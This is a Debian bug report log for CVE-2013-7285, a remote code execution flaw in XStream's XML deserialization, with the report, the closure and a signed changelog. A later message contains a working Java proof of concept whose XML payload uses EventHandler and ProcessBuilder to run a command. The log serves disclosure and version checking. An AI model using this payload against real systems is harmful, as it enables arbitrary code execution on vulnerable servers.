libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream

Related Vulnerabilities: CVE-2013-7285  

Debian Bug report logs - #734821
libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Fri, 10 Jan 2014 02:54:02 UTC

Severity: grave

Tags: security, upstream

Done: Emmanuel Bourg <ebourg@apache.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#734821; Package libxstream-java. (Fri, 10 Jan 2014 02:54:06 GMT) (full text, mbox, link).


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Fri, 10 Jan 2014 02:54:06 GMT) (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: libxstream-java: CVE-2013-7285: remote code execution via deserialization in XStream
Date: Fri, 10 Jan 2014 03:51:22 +0100
Package: libxstream-java
Severity: grave
Tags: security upstream

Hi,

the following vulnerability was published for libxstream-java.

CVE-2013-7285[0]:
remote code execution via deserialization in XStream

See also [1] for the original report. [3] contains an initial patch
which was commited.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7285
    http://security-tracker.debian.org/tracker/CVE-2013-7285
[1] http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
[2] http://markmail.org/message/kfqoqdfj5fnup5co?q=list:org.codehaus.xstream.dev&page=3
[3] https://fisheye.codehaus.org/changelog/xstream?cs=2210

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore



Reply sent to Emmanuel Bourg <ebourg@apache.org>:
You have taken responsibility. (Wed, 12 Mar 2014 13:36:23 GMT) (full text, mbox, link).


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Wed, 12 Mar 2014 13:36:23 GMT) (full text, mbox, link).


Message #10 received at 734821-close@bugs.debian.org (full text, mbox, reply):

From: Emmanuel Bourg <ebourg@apache.org>
To: 734821-close@bugs.debian.org
Subject: Bug#734821: fixed in libxstream-java 1.4.7-1
Date: Wed, 12 Mar 2014 13:33:33 +0000
Source: libxstream-java
Source-Version: 1.4.7-1

We believe that the bug you reported is fixed in the latest version of
libxstream-java, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 734821@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Emmanuel Bourg <ebourg@apache.org> (supplier of updated libxstream-java package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Wed, 12 Mar 2014 14:06:33 +0100
Source: libxstream-java
Binary: libxstream-java
Architecture: source all
Version: 1.4.7-1
Distribution: unstable
Urgency: low
Maintainer: Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>
Changed-By: Emmanuel Bourg <ebourg@apache.org>
Description: 
 libxstream-java - Java library to serialize objects to XML and back again
Closes: 734821
Changes: 
 libxstream-java (1.4.7-1) unstable; urgency=low
 .
   * New upstream release
     - Fixes CVE-2013-7285 (Closes: #734821)
     - Added a dependency on libjdom2-java
   * Standards-Version updated to 3.9.5 (no changes)
   * Use XZ compression for the upstream tarball
   * Build depend on debhelper >= 9
   * debian/copyright: Updated to the Copyright Format 1.0
Checksums-Sha1: 
 684b6cc0d8edae45924832e4eedda12c780cb624 2343 libxstream-java_1.4.7-1.dsc
 329882aa8cb64b0ec729d840453a27608f59aba1 397328 libxstream-java_1.4.7.orig.tar.xz
 243eb22bca15817712111ca2645a867377ef2a8e 5960 libxstream-java_1.4.7-1.debian.tar.xz
 a41e3fee90ff5d6361d0538a84ea8afdcf32e33d 583860 libxstream-java_1.4.7-1_all.deb
Checksums-Sha256: 
 8698da0a6520f6ab54efadad2e98c5d5e51f37faf0506b155208db85304bc3f2 2343 libxstream-java_1.4.7-1.dsc
 33aeb2217d2dd3734abcd6cc6f3d3283fed2646e4cbc79102d5237a099738eed 397328 libxstream-java_1.4.7.orig.tar.xz
 08c314aa33cb9164620110466cbe106369aedcc1e8718f1551bcce347c63004a 5960 libxstream-java_1.4.7-1.debian.tar.xz
 5a191aa57415acd1c5fb2f6af53ea7f751c615abb8bf9b00a9070f58cb19d322 583860 libxstream-java_1.4.7-1_all.deb
Files: 
 c8d6431cf68e71eda78e67e950e079aa 2343 java optional libxstream-java_1.4.7-1.dsc
 09de7d2175bdc6c002aa681e3004d8d6 397328 java optional libxstream-java_1.4.7.orig.tar.xz
 3e72fa42334aaed7ec2248a9ffd3ccf1 5960 java optional libxstream-java_1.4.7-1.debian.tar.xz
 72573fdd9319ffae8b1d9dafd65e2c02 583860 java optional libxstream-java_1.4.7-1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJTIF7aAAoJEPUTxBnkudCs+a4P/j+JXVoQeggxQ7CJUNrv/9Gr
XkGmG2ggPugGcdFcQ+VcMNwNHLoQc+kjgPUJltfoFR2SdXXtyj25ObZMfNKIe1Kk
yeospGr9CbGXwwCLLn30HFX/jPSxizcGMn9LecFtw5K0zgjlxR/lJBAwml/0hHmE
vHQ1u1rUCique6HbZYWakuJDp8bY9q+XrRxYJIWIKUNnWKJnp1c/Kch4siBw9XF5
gpAnuAVNpPJ5BdWElRh84GauSOxmiZdt3vIYYu9LO1CaVjcNStck1F9MYDjHLnYU
hjRv+0wOyTsNBsgDwGm7pvkc0MF3y05v/rxcS1yw9FVkP7aBk6I8owqgz+DQaQRN
CfvZSdAJTbsA9UtnCgsi5XMCx6G0BQSjRNjWfOtEvbzZ2ybFn7igMbJFoS7jATvF
lJZhWeT5rFPR5PnjZU3eHukO1Jp/o+2yjRdyfAuuDh83+LCFj87n8W+aCQ5PbHdS
lYxHPxQ/4+Bg1lH0Od9ddTMpixNY1OS4vPviUT3OvtUsXj3Rv2YkqwrWiNcuw+0v
fhBzRtC2nXBWcBfJ+T96V8GTPYxRX8dYzEAo+hU5ckqkfRU+a0uMfZBw7ygF8xBf
KD/7ZZxMqgDNFK3RYHyzJdOraNbWA8zhnlfFjrMfEJ1q6z9gNv8d94dZiKFYxJ8f
+Rnu7yy6ohjBobID97WK
=0TkV
-----END PGP SIGNATURE-----




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>:
Bug#734821; Package libxstream-java. (Fri, 10 Oct 2014 09:21:14 GMT) (full text, mbox, link).


Acknowledgement sent to Sébastien Delafond <seb@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Java Maintainers <pkg-java-maintainers@lists.alioth.debian.org>. (Fri, 10 Oct 2014 09:21:14 GMT) (full text, mbox, link).


Message #15 received at 734821@bugs.debian.org (full text, mbox, reply):

From: Sébastien Delafond <seb@debian.org>
To: 734821@bugs.debian.org
Cc: control@bugs.debian.org
Subject: 734821
Date: Fri, 10 Oct 2014 11:19:58 +0200
notfixed 734821 1.4.7-1
thanks

This bug was actually never in Debian, since it was introduced in 1.4.5
and closed in 1.4.7.

If anyone is interested in verifying this, the following code can be run
against the JARs present at
http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/:

  import java.io.IOException;
  import com.thoughtworks.xstream.XStream;
  import com.thoughtworks.xstream.io.xml.DomDriver;

  /* Thanks to </pwntester> for the PoC
   * http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ */
  public class XStreamExploit {
      public static void main(String[] args) throws IOException   {
          String process = "/usr/bin/xeyes";
          String payload = "<sorted-set>" +
              "<string>foo</string>" +
              "<dynamic-proxy>" +
              "<interface>java.lang.Comparable</interface>" +
              "<handler class=\"java.beans.EventHandler\">" +
              " <target class=\"java.lang.ProcessBuilder\">" +
              " <command>" +
              " <string>" + process + "</string>" +
              " </command>" +
              " </target>" +
              " <action>start</action>" +
              "</handler>" +
              "</dynamic-proxy>" +
              "</sorted-set>";
          XStream xstream = new XStream(new DomDriver());
          xstream.fromXML(payload);
      }
  }

Cheers,

--Seb



No longer marked as fixed in versions libxstream-java/1.4.7-1. Request was from Sébastien Delafond <seb@debian.org> to control@bugs.debian.org. (Fri, 10 Oct 2014 09:21:22 GMT) (full text, mbox, link).


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 08 Nov 2014 07:26:44 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 16:41:24 2019; Machine Name: beach

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.